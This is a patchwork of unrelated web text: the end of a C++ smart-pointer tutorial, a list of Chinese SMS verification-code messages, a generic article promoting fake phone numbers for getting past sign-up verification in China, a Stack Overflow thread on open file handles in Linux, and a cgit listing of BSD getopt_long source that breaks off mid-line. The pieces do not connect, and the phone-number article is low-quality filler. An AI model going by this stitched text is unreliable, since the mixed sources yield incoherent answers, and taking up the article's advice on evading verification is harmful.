ownership. In our example, we can use: doSomethig(std::move(myTest)); to move the pointer's ownership. That way after the function returns out pointer is also not valid, but we did it on purpose after all. Another nice advantage of this type of pointer is that we can use custom deleters. It is useful when we have some complicated resources (files, textures, etc.). How to Use Arrays with unique_ptr? First thing to know: std::unique_ptr<int> p(new int[10]); // will not work! The above code will compile, but when resources are about to be deleted, only single delete will be called. So how do we ensure that delete[] is called? Fortunately, unique pointers have proper partial specialization for arrays and we can have: std::unique_ptr<int[]> p(new int[10]); p[0] = 10; For our particular example, we can write: std::unique_ptr<Test[]> tests(new Test[3]); And we will get the desired output: Test::Test Test::Test Test::Test Test::~Test destructor Test::~Test destructor Test::~Test destructor As expected. Smile | <img src= Note that if you want to pass address of the first element, you have to use &(pointerToArray[0]). Writing pointerToArray will not work. Why Create shared_ptr with make_shared? Unique pointers provides their features only via wise usage of C++ syntax (using private copy constructor, assignment, etc.), they do not need any additional memory. With shared_ptr we need to associate some reference counter with our object. When we do: std::shared_ptr<Test> sp(new Test()); std::shared_ptr<Test> sp2 = std::make_shared<Test>(); We will get the output as expected: Test::Test Test::Test Test::~Test destructor Test::~Test destructor So what is the difference? Why not use syntax similar to creation of unique_ptr? Answer lies in the allocation process. With the first construct, we need to allocate a space for the object and then for the reference counter. With the second construct, there is only one allocation (using placement new) and ref counter shares the same memory block as the pointed object. VS2012 locals view Above, you can see a picture with local's view in the VS 2012. Compare the addresses of object data and reference counter block. For the sp2, we can see that they are very close to each other. To be sure, I got proper results I've even asked question on stackoverflow: http://stackoverflow.com/questions/14665935/make-shared-evidence-vs-default-construct. BTW: in C++14 there is a nice improvement: make_unique function ! That way creating smart pointers is a bit more 'unified'. We have make_shared and make_unique. How to Use Arrays with shared_ptr? Arrays with shared_ptr are a bit trickier that when using unique_ptr, but we can use our own deleter and have full control over them. std::shared_ptr<Test> sp(new Test[2], [](Test *p) { delete [] p; }); We need to use custom deleter (here as a lambda expression). Additionally, we cannot use make_shared construction. Unfortunately using shared pointers for arrays is not so nice. I suggest taking boost instead. For instance: http://www.boost.org/doc/libs/1520/libs/smartptr/sharedarray.htm. How to Pass Smart Pointers to Functions? We should use smart pointers as a first class objects in C++, so in general we should pass them by value to functions. That way reference counter will increase/decrease correctly. But we can use some other constructions which seems to be a bit misleading. Here is some code: void testSharedFunc(std::shared_ptr<Test> sp) { sp->m_value = 10; } void testSharedFuncRef(const std::shared_ptr<Test> &sp) { sp->m_value = 10; } void SharedPtrParamTest() { std::shared_ptr<Test> sp = std::make_shared<Test>(); testSharedFunc(sp); testSharedFuncRef(sp); } The above code will work as assumed, but in testSharedFuncRef we get no benefit of using shared pointers at all! Only testSharedFunc will increase reference counter. For some performance critical code we, additionally, need to notice that passing by value will need to copy whole pointer block, so maybe it is better to use even raw pointer there. But, perhaps the second option (with reference) is better? It depends. The main question is if you want to have full ownership of the object. If not (for instance, you have some generic function that calls methods of the object) then we do not need ownership... simple passing by reference is good and fast method. It is not only me who gets confused. Even Herb Sutter paid some attention to this problem and here is his post on that matter: http://herbsutter.com/2012/06/05/gotw-105-smart-pointers-part-3-difficulty-710/. How to cast smart pointers? Let's take a common example with a simple inheritance: class BaseA { protected: int a{ 0 }; public: virtual ~BaseA() { } void A(int p) { a = p; } }; class ChildB : public BaseA { private: int b{ 0 }; public: void B(int p) { b = p; } }; Without a problem, you can create a smart pointer to BaseA and initialize it with ChildB: std::shared_ptr<BaseA> ptrBase = std::make_shared<ChildB>(); ptrBase->A(10); But how to get a pointer to a ChildB class from ptrBase? Although, it is not a good practice, sometimes we know it is needed. You can try this: ChildB *ptrMan = dynamic_cast<ChildB *>(ptrBase.get()); ptrMan->B(10); It should work. But, that way you get a 'normal' pointer only! The use_count for the original ptrBase is not incremented. You can now observe the object, but you are not the owner. It is better to use casts designed for smart pointers: std::shared_ptr<ChildB> ptrChild = std::dynamic_pointer_cast<ChildB>(ptrBase); if (ptrChild) { ptrChild->B(20); std::cout << "use count A: " << ptrBase.use_count() << std::endl; std::cout << "use count B: " << ptrChild.use_count() << std::endl; } by using std::dynamic_pointer_cast you get a shared pointer. Now you are also the owner. Use count for ptrBase and ptrChild is '2' in this case. Take a look at std::static_pointer_cast and std::const_pointer_cast for more information. What about unique_ptr? In the previous example you got a copy of the original pointer. But unique_ptr cannot have copies... so it is no sense to provide a casting functions. If you need a casted pointer for observation then you need to do it the old way. Some Additional Comments Smart pointers are very useful, but we, as users, also need to be smart. I am not as experienced with smart pointers as I would like to be. For instance, sometimes I am tempted to use raw pointers: I know what will happen, and at a time I can guarantee that it will not mess with the memory. Unfortunately, this can be a potential problem in the future. When code changes, my assumptions can be not valid any more and new bugs may occur. Another thing is when new developer starts changing my code. With smart pointers, it is not so easy to break things. All this topic is a bit complicated, but as usual in C++, we get something at a price. We need to know what we are doing to fully utilize a particular feature. The code for the article can be found here. Links License This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Share About the Author Bartlomiej Filipek Software Developer Poland Poland Software developer interested in creating great code and passionate about teaching. I have around 10 years of professional experience in C++/Windows/Visual Studio programming. Plus other technologies like: OpenGL, game development, performance optimization. If you like my articles please subscribe to my coding blog or just visit www.bfilipek.com. You may also be interested in... Comments and Discussions   GeneralMy vote of 5 Pin Paulo Zemek28-Aug-14 4:44 professionalPaulo Zemek28-Aug-14 4:44  GeneralRe: My vote of 5 Pin Bartlomiej Filipek28-Aug-14 5:22 memberBartlomiej Filipek28-Aug-14 5:22  QuestionThere is a coherent approach Pin john morrison leon28-Aug-14 1:40 memberjohn morrison leon28-Aug-14 1:40  AnswerRe: There is a coherent approach Pin Bartlomiej Filipek28-Aug-14 5:25 memberBartlomiej Filipek28-Aug-14 5:25  QuestionMissing images Pin Akhil Mittal 27-Aug-14 1:57 mvp Akhil Mittal 27-Aug-14 1:57  General General    News News    Suggestion Suggestion    Question Question    Bug Bug    Answer Answer    Joke Joke    Praise Praise    Rant Rant    Admin Admin    Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages. Permalink | Advertise | Privacy | Terms of Use | Mobile Web03 | 2.8.170915.1 | Last Updated 27 Aug 2014 Article Copyright 2013 by Bartlomiej Filipek Everything else Copyright © CodeProject, 1999-2017 Layout: fixed | fluid
__label__pos
0.675896
  【优酷视频】您的验证码为:8038,该验证码 5 分钟有效,请勿泄露他人。   【人人车二手车】164567(登录验证码)。工作人员不会向您索要,请勿向任何人泄露,以免造成账户或资金损失。   【5sing原创音乐】您的验证码为:234070,该验证码 5 分钟有效,请勿泄露他人。   【豌豆荚】您的验证码为:314836,该验证码 5 分钟有效,请勿泄露他人。   【百度翻译】尊敬的客户:您办理业务的短信验证码是:198837。安全提示:任何人索取验证码均为诈骗,切勿泄露!   【手心输入法】您的注册验证码是 285710,请不要把验证码泄漏给其他人,如非本人请勿操作。   【17度租赁公装】验证码461481,您正在注册成为新用户,感谢您的支持!   【360浏览器】您的验证码是 6600。如非本人操作,请忽略本短信。   【追书神器】您的验证码为:323191,为保证账户安全,请勿向任何人提供此验证码。   【墨迹天气】验证码:6726 。您正在使用登录功能,验证码提供他人可能导致帐号被盗,请勿转发或泄漏。 Test Phone Numbers: The Ultimate Guide to Generating Fake Phone Numbers in China Test phone numbers play a crucial role in various online activities such as testing software, signing up for services, and protecting personal information. In a highly digitized world, phone numbers are often required for verification purposes. However, sharing your real phone number online can lead to privacy and security risks. This is where fake phone numbers come into play. Generating fake phone numbers allows you to maintain your privacy while still complying with verification requirements. In China, the use of fake phone numbers has become increasingly popular due to the strict regulations surrounding the internet and data privacy. So, how can you generate fake phone numbers in China? One of the most common methods is to use online tools and websites that provide temporary phone numbers. These numbers are valid for a short period and can be used for various online activities. Additionally, many apps offer virtual phone numbers that allow you to receive calls and messages without revealing your actual phone number. Using fake phone numbers in China can be especially useful when signing up for online services that require phone verification but may share your information with third parties. By using a fake phone number, you can avoid spam calls and protect your personal data. Another benefit of fake phone numbers is the ability to conduct testing and experiments without using your real phone number. For developers and software testers, having access to test phone numbers is essential for verifying functionality and ensuring a smooth user experience. Whether you're testing a new app, signing up for a trial account, or conducting market research, fake phone numbers can help streamline the process and protect your privacy. It's important to note that while using fake phone numbers can be convenient, it's essential to use them responsibly. Avoid using fake phone numbers for illegal activities or for malicious purposes. Additionally, be aware of the limitations of using fake phone numbers, such as in situations where phone verification is mandatory for security reasons. In conclusion, test phone numbers and fake phone numbers are valuable tools for maintaining privacy, protecting personal information, and conducting testing activities in a digital world. By understanding how to generate and use fake phone numbers in China, you can enhance your online experience and safeguard your data. Next time you need a temporary phone number for testing or verification, consider using a fake phone number to stay safe and secure in the digital realm. More numbers from China
__label__pos
0.991633
Take the 2-minute tour × Stack Overflow is a question and answer site for professional and enthusiast programmers. It's 100% free, no registration required. What happens to an open file handler on Linux if the pointed file meanwhile gets: • Moved away -> Does the file handler stays valid? • Deleted -> Does this lead to an EBADF, indicating an invalid file handler? • Replaced by a new file -> Does the file handler pointing to this new file? • Replace by a hard link to a new file -> Does my file handler "follow" this link? • Replace by a soft link to a new file -> Does my file handler hit this soft link file now? Why I'm asking such questions: I'm using hotplugged hardware (such as USB devices etc.). It can happen, that the device (and also it's /dev/file) gets reattached by the user or another Gremlin. What's the best practice dealing with this? Thanks for sharing your experience! share|improve this question 6 Answers 6 up vote 33 down vote accepted If the file is moved (in the same filesystem) or renamed, then the file handle remains open and can still be used to read and write the file. If the file is deleted, the file handle remains open and can still be used (This is not what some people expect). The file will not really be deleted until the last handle is closed. If the file is replaced by a new file, it depends exactly how. Either the file is overwritten, in which case the file handle will still be valid and access the new file, or the existing file is unlinked and a new one created with the same name, in which case it's the same as deletion (see above). In general, once the file is open, the file is open, and nobody changing the directory structure can change that - they can move, rename the file, or put something else in its place, it simply remains open. In Unix there is no delete, only unlink(), which makes sense as it doesn't necessarily delete the file - just removes the link from the directory. If on the other hand the underlying device disappears (e.g. USB unplug) then the file handle won't be valid an more and is likely to give IO/error on any operation. You still have to close it though. This is going to be true even if the device is plugged back in, as it's not sensible to keep a file open in this case. share|improve this answer      I suppose that your second point applies equally if a containing directory of the file is deleted. Is that so? –  Drew Noakes Mar 17 '14 at 10:49      I'm interested in one thing: if you use cp command to overwrite a file, is it the first case or the second case? –  xuhdev Apr 24 '14 at 22:07 File handles point to an inode not to a path, so most of your scenarios still work as you assume, since the handle still points to the file. Specifically, with the delete scenario - the function is called "unlink" for a reason, it destroys a "link" between a filename (a dentry) and a file. When you open a file, then unlink it, the file actually still exists until its reference count goes to zero, which is when you close the handle. Edit: In the case of hardware, you have opened a handle to a specific device node, if you unplug the device, the kernel will fail all accesses to it, even if the device comes back. You will have to close the device and reopen it. share|improve this answer The in-memory information of a deleted file (all the examples you give are instances of a deleted file) as well as the inodes on-disk remain in existence until the file is closed. Hardware being hotplugged is a completely different issue, and you should not expect your program to stay alive long if the on-disk inodes or metadata have changed at all. share|improve this answer I'm not sure about the other operations, but as for deletion: Deletion simply doesn't take place (physically, i.e. in the file system) until the last open handle to the file is closed. Thus it should not be possible to delete a file out from under your application. A few apps (that don't come to mind) rely on this behavior, by creating, opening and immediately deleting files, which then live exactly as long as the application - allowing other applications to be aware of the first app's lifecycle without needing to look at process maps and such. It's possible similar considerations apply to the other stuff. share|improve this answer Under /proc/ directory you will find a list of every process currently active, just find your PID and all data regarding is there. An interresting info is the folder fd/, you will find all file handlers currently opened by the process. Eventually you will find a symbolic link to your device (under /dev/ or even /proc/bus/usb/), if the device hangs the link will be dead and it will be impossible to refresh this handle, the process must close and open it again (even with reconnection) This code can read your PID's link current status #include <unistd.h> #include <stdio.h> #include <dirent.h> int main() { // the directory we are going to open DIR *d; // max length of strings int maxpathlength=256; // the buffer for the full path char path[maxpathlength]; // /proc/PID/fs contains the list of the open file descriptors among the respective filenames sprintf(path,"/proc/%i/fd/",getpid() ); printf("List of %s:\n",path); struct dirent *dir; d = opendir(path); if (d) { //loop for each file inside d while ((dir = readdir(d)) != NULL) { //let's check if it is a symbolic link if (dir->d_type == DT_LNK) { const int maxlength = 256; //string returned by readlink() char hardfile[maxlength]; //string length returned by readlink() int len; //tempath will contain the current filename among the fullpath char tempath[maxlength]; sprintf(tempath,"%s%s",path,dir->d_name); if ((len=readlink(tempath,hardfile,maxlength-1))!=-1) { hardfile[len]='\0'; printf("%s -> %s\n", dir->d_name,hardfile); } else printf("error when executing readlink() on %s\n",tempath); } } closedir(d); } return 0; } This final code is simple, you can play with linkat function. int open_dir(char * path) { int fd; path = strdup(path); *strrchr(path, '/') = '\0'; fd = open(path, O_RDONLY | O_DIRECTORY); free(path); return fd; } int main(int argc, char * argv[]) { int odir, ndir; char * ofile, * nfile; int status; if (argc != 3) return 1; odir = open_dir(argv[1]); ofile = strrchr(argv[1], '/') + 1; ndir = open_dir(argv[2]); nfile = strrchr(argv[2], '/') + 1; status = linkat(odir, ofile, ndir, nfile, AT_SYMLINK_FOLLOW); if (status) { perror("linkat failed"); } return 0; } share|improve this answer if you want to check if the file handler(file descriptor) is okay, you can call this function. /** * version : 1.1 * date : 2015-02-05 * func : check if the fileDescriptor is fine. */ #include <unistd.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <stdio.h> /** * On success, zero is returned. On error, -1 is returned, and errno is set * appropriately. */ int check_fd_fine(int fd) { struct stat _stat; int ret = -1; if(!fcntl(fd, F_GETFL)) { if(!fstat(fd, &_stat)) { if(_stat.st_nlink >= 1) ret = 0; else printf("File was deleted!\n"); } } if(errno != 0) perror("check_fd_fine"); return ret; } int main() { int fd = -1; fd = open("/dev/ttyUSB1", O_RDONLY); if(fd < 0) { perror("open file fail"); return -1; } // close or remove file(remove usb device) // close(fd); sleep(5); if(!check_fd_fine(fd)) { printf("fd okay!\n"); } else { printf("fd bad!\n"); } close(fd); return 0; } share|improve this answer Your Answer   discard By posting your answer, you agree to the privacy policy and terms of service. Not the answer you're looking for? Browse other questions tagged or ask your own question.
__label__pos
0.906917
ALERT: Datto Drive Cloud service will no longer be available as of June 1, 2019. For more information, see our end-of-life article. To learn how to download your Datto Drive Cloud data, please visit this article. Swapping a SIRIS Business OS Drive Follow Scope This article walks through how to swap the OS drive on a SIRIS Business device. Before replacing the OS drive, contact Datto Support so that they can take any necessary steps prior to the swap. You should also contact Support again once the new drive is in place to ensure the device is running properly. Tools Required: ­ • PH1 cross head screwdriver • PH2 cross head screwdriver • Small cable ties • Monitor and keyboard for accessing the device after replacing the OS drive Swapping the OS Drive 1. Power down and unplug the device. Locate and remove the three screws that secure the chassis cover. 2. Slide the chassis cover towards the rear of the device. You will have to push in on the top and sides while simultaneously pulling the cover. 3. Locate the OS drive (Kingston SSD 60GB) mounted to the front of the device and disconnect its SATA and power cables. 4. Remove the USB 3.0 connector from the Motherboard. Moving aside the power cables from the PSU will make the replacement easier.  5. Remove the four screws from the drive plate that secures the OS drive. 6. Remove the OS drive and drive plate by sliding it slightly backwards and then pulling it up off of the device. Again, move the power cables aside for easier access. You should label the old OS drive to differentiate it from the new one. 7. Install the new OS drive to the mounting plate, making sure that it is fitted on the raised/stilted side of the mounting plate. Then screw it back into the chassis. 8. Reattach the SATA, power, and USB 3.0 cables and verify the connections are snug and secure. Tuck the power cables back into place in the chassis (see image from Step 2 for reference). 9. Carefully replace the chassis cover, making sure that all cables are clear. Once fitted, reinstall the three original screws removed in Step 1.   10. Connect a keyboard and monitor, along with the power and Ethernet cables. 11. Contact Datto Support to begin checking in the device. Was this article helpful? 0 out of 0 found this helpful You must sign in before voting on this article. Want to talk about it? Have a feature request? Head on over to our Community Forum or get live help.
__label__pos
0.518637
renderJson - how to renderXML? hi i have that in function: return $this->response->withJson($args); now i what to do the same but with XML what function like “withJson” in need to render my file to xml file? We don’t have a short-cut for XML. you will have to write your own. so how i can do a sitemap? without a package ? Keeping a public sitemap would be up to the developer. hi id somone need the code: (work with twig) protected function renderXML($template, $args = []) { //switch to XML file with Content-Type $this->view->render($this->response, $template . '.xml', $args); return $this->response->withHeader('Content-Type','text/xml'); }
__label__pos
0.999833
summaryrefslogtreecommitdiff path: root/lib/win32/getopt_long.cpp blob: 825de2a0f862ab08fe3caf2e6df028c6a1a73598 (plain) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 /* $OpenBSD: getopt_long.c,v 1.20 2005/10/25 15:49:37 jmc Exp $ */ /* $NetBSD: getopt_long.c,v 1.15 2002/01/31 22:43:40 tv Exp $ */ // Adapted for Box Backup by Chris Wilson <[email protected]> /* * Copyright (c) 2002 Todd C. Miller <[email protected]> * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. * * Sponsored in part by the Defense Advanced Research Projects * Agency (DARPA) and Air Force Research Laboratory, Air Force * Materiel Command, USAF, under agreement number F39502-99-1-0512. */ /*- * Copyright (c) 2000 The NetBSD Foundation, Inc. * All rights reserved. * * This code is derived from software contributed to The NetBSD Foundation * by Dieter Baron and Thomas Klausner. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the NetBSD * Foundation, Inc. and its contributors. * 4. Neither the name of The NetBSD Foundation nor the names of its * contributors may be used to endorse or promote products derived * from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE NETBSD FOUNDATION, INC. AND CONTRIBUTORS * ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED * TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE FOUNDATION OR CONTRIBUTORS * BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. */ // #include "Box.h" #include "emu.h" #include <errno.h> #include <stdarg.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include "box_getopt.h" #ifdef REPLACE_GETOPT // until end of file int opterr = 1; /* if error message should be printed */ int optind = 1; /* index into parent argv vector */ int optopt = '?'; /* character checked for validity */ int optreset; /* reset getopt */ char *optarg; /* argument associated with option */ #define PRINT_ERROR ((opterr) && (*options != ':')) #define FLAG_PERMUTE 0x01 /* permute non-options to the end of argv */ #define FLAG_ALLARGS 0x02 /* treat non-options as args to option "-1" */ #define FLAG_LONGONLY 0x04 /* operate as getopt_long_only */ /* return values */ #define BADCH (int)'?' #define BADARG ((*options == ':') ? (int)':' : (int)'?') #define INORDER (int)1 #define EMSG "" static void warnx(const char* fmt, ...) { va_list ap; va_start(ap, fmt); vfprintf(stderr, fmt, ap); va_end(ap); fprintf(stderr, "\n"); } static int getopt_internal(int, char * const *, const char *, const struct option *, int *, int); static int parse_long_options(char * const *, const char *, const struct option *, int *, int); static int gcd(int, int); static void permute_args(int, int, int, char * const *); static char *place = EMSG; /* option letter processing */ /* XXX: set optreset to 1 rather than these two */ static int nonopt_start = -1; /* first non option argument (for permute) */ static int nonopt_end = -1; /* first option after non options (for permute) */ /* Error messages */ static const char recargchar[] = "option requires an argument -- %c"; static const char recargstring[] = "option requires an argument -- %s"; static const char ambig[] = "ambiguous option -- %.*s"; static const char noarg[] = "option doesn't take an argument -- %.*s"; static const char illoptchar[] = "unknown option -- %c"; static const char illoptstring[] = "unknown option -- %s"; /* * Compute the greatest common divisor of a and b. */ static int gcd(int a, int b) { int c; c = a % b; while (c != 0) { a = b; b = c; c = a % b; } return (b); } /* * Exchange the block from nonopt_start to nonopt_end with the block * from nonopt_end to opt_end (keeping the same order of arguments * in each block). */ static void permute_args(int panonopt_start, int panonopt_end, int opt_end, char * const *nargv) { int cstart, cyclelen, i, j, ncycle, nnonopts, nopts, pos; char *swap; /* * compute lengths of blocks and number and size of cycles */ nnonopts = panonopt_end - panonopt_start; nopts = opt_end - panonopt_end; ncycle = gcd(nnonopts, nopts); cyclelen = (opt_end - panonopt_start) / ncycle; for (i = 0; i < ncycle; i++) { cstart = panonopt_end+i; pos = cstart; for (j = 0; j < cyclelen; j++) { if (pos >= panonopt_end) pos -= nnonopts; else pos += nopts; swap = nargv[pos]; /* LINTED const cast */ ((char **) nargv)[pos] = nargv[cstart]; /* LINTED const cast */ ((char **)nargv)[cstart] = swap; } } } /* * parse_long_options -- * Parse long options in argc/argv argument vector. * Returns -1 if short_too is set and the option does not match long_options. */ static int parse_long_options(char * const *nargv, const char *options, const struct option *long_options, int *idx, int short_too) { char *current_argv, *has_equal; size_t current_argv_len; int i, match; current_argv = place; match = -1; optind++; if ((has_equal = strchr(current_argv, '=')) != NULL) { /* argument found (--option=arg) */ current_argv_len = has_equal - current_argv; has_equal++; } else current_argv_len = strlen(current_argv); for (i = 0; long_options[i].name; i++) { /* find matching long option */ if (strncmp(current_argv, long_options[i].name, current_argv_len)) continue; if (strlen(long_options[i].name) == current_argv_len) { /* exact match */ match = i; break; } /* * If this is a known short option, don't allow * a partial match of a single character. */ if (short_too && current_argv_len == 1) continue; if (match == -1) /* partial match */ match = i; else { /* ambiguous abbreviation */ if (PRINT_ERROR) warnx(ambig, (int)current_argv_len, current_argv); optopt = 0; return (BADCH); } } if (match != -1) { /* option found */ if (long_options[match].has_arg == no_argument && has_equal) { if (PRINT_ERROR) warnx(noarg, (int)current_argv_len, current_argv); /* * XXX: GNU sets optopt to val regardless of flag */ if (long_options[match].flag == NULL) optopt = long_options[match].val; else optopt = 0; return (BADARG); } if (long_options[match].has_arg == required_argument || long_options[match].has_arg == optional_argument) { if (has_equal) optarg = has_equal; else if (long_options[match].has_arg == required_argument) { /* * optional argument doesn't use next nargv */ optarg = nargv[optind++]; } } if ((long_options[match].has_arg == required_argument) && (optarg == NULL)) { /* * Missing argument; leading ':' indicates no error * should be generated. */ if (PRINT_ERROR) warnx(recargstring, current_argv); /* * XXX: GNU sets optopt to val regardless of flag */ if (long_options[match].flag == NULL) optopt = long_options[match].val; else optopt = 0; --optind; return (BADARG); } } else { /* unknown option */ if (short_too) { --optind; return (-1); } if (PRINT_ERROR) warnx(illoptstring, current_argv); optopt = 0; return (BADCH); } if (idx) *idx = match; if (long_options[match].flag) { *long_options[match].flag = long_options[match].val; return (0); } else return (long_options[match].val); } /* * getopt_internal -- * Parse argc/argv argument vector. Called by user level routines. */ static int getopt_internal(int nargc, char * const *nargv, const char *options, const struct option *long_options, int *idx, int flags) { const char * oli; /* option letter list index */ int optchar, short_too; static int posixly_correct = -1; if (options == NULL) return (-1); /* * Disable GNU extensions if POSIXLY_CORRECT is set or options * string begins with a '+'. */ if (posixly_correct == -1) posixly_correct = (getenv("POSIXLY_CORRECT") != NULL); if (posixly_correct || *options == '+') flags &= ~FLAG_PERMUTE; else if (*options == '-') flags |= FLAG_ALLARGS; if (*options == '+' || *options == '-') options++; /* * XXX Some GNU programs (like cvs) set optind to 0 instead of * XXX using optreset. Work around this braindamage. */ if (optind == 0) optind = optreset = 1; optarg = NULL; if (optreset) nonopt_start = nonopt_end = -1; start: if (optreset || !*place) { /* update scanning pointer */ optreset = 0; if (optind >= nargc) { /* end of argument vector */ place = EMSG; if (nonopt_end != -1) { /* do permutation, if we have to */ permute_args(nonopt_start, nonopt_end, optind, nargv); optind -= nonopt_end - nonopt_start; } else if (nonopt_start != -1) { /* * If we skipped non-options, set optind * to the first of them. */ optind = nonopt_start; } nonopt_start = nonopt_end = -1; return (-1); } if (*(place = nargv[optind]) != '-' || (place[1] == '\0' && strchr(options, '-') == NULL)) { place = EMSG; /* found non-option */ if (flags & FLAG_ALLARGS) { /* * GNU extension: * return non-option as argument to option 1 */ optarg = nargv[optind++]; return (INORDER); } if (!(flags & FLAG_PERMUTE)) { /* * If no permutation wanted, stop parsing * at first non-option. */ return (-1); } /* do permutation */ if (nonopt_start == -1) nonopt_start = optind; else if (nonopt_end != -1) { permute_args(nonopt_start, nonopt_end, optind, nargv); nonopt_start = optind - (nonopt_end - nonopt_start); nonopt_end = -1; } optind++; /* process next argument */ goto start; } if (nonopt_start != -1 && nonopt_end == -1) nonopt_end = optind; /* * If we have "-" do nothing, if "--" we are done. */ if (place[1] != '\0' && *++place == '-' && place[1] == '\0') { optind++; place = EMSG; /* * We found an option (--), so if we skipped * non-options, we have to permute. */ if (nonopt_end != -1) { permute_args(nonopt_start, nonopt_end, optind, nargv); optind -= nonopt_end - nonopt_start; } nonopt_start = nonopt_end = -1; return (-1); } } /* * Check long options if: * 1) we were passed some * 2) the arg is not just "-" * 3) either the arg starts with -- we are getopt_long_only() */ if (long_options != NULL && place != nargv[optind] && (*place == '-' || (flags & FLAG_LONGONLY))) { short_too = 0; if (*place == '-') place++; /* --foo long option */ else if (*place != ':' && strchr(options, *place) != NULL) short_too = 1; /* could be short option too */ optchar = parse_long_options(nargv, options, long_options, idx, short_too); if (optchar != -1) { place = EMSG; return (optchar); } } if ((optchar = (int)*place++) == (int)':' || optchar == (int)'-' && *place != '\0' || (oli = strchr(options, optchar)) == NULL) { /* * If the user specified "-" and '-' isn't listed in * options, return -1 (non-option) as per POSIX. * Otherwise, it is an unknown option character (or ':'). */ if (optchar == (int)'-' && *place == '\0') return (-1); if (!*place) ++optind; if (PRINT_ERROR) warnx(illoptchar, optchar); optopt = optchar; return (BADCH); } if (long_options != NULL && optchar == 'W' && oli[1] == ';') { /* -W long-option */ if (*place) /* no space */ /* NOTHING */; else if (++optind >= nargc) { /* no arg */ place = EMSG; if (PRINT_ERROR) warnx(recargchar, optchar); optopt = optchar; return (BADARG); } else /* white space */ place = nargv[optind]; optchar = parse_long_options(nargv, options, long_options, idx, 0); place = EMSG; return (optchar); } if (*++oli != ':') { /* doesn't take argument */ if (!*place) ++optind; } else { /* takes (optional) argument */ optarg = NULL; if (*place) /* no white space */ optarg = place; /* XXX: disable test for :: if PC? (GNU doesn't) */ else if (oli[1] != ':') { /* arg not optional */ if (++optind >= nargc) { /* no arg */ place = EMSG; if (PRINT_ERROR) warnx(recargchar, optchar); optopt = optchar; return (BADARG); } else optarg = nargv[optind]; } else if (!(flags & FLAG_PERMUTE)) { /* * If permutation is disabled, we can accept an * optional arg separated by whitespace so long * as it does not start with a dash (-). */ if (optind 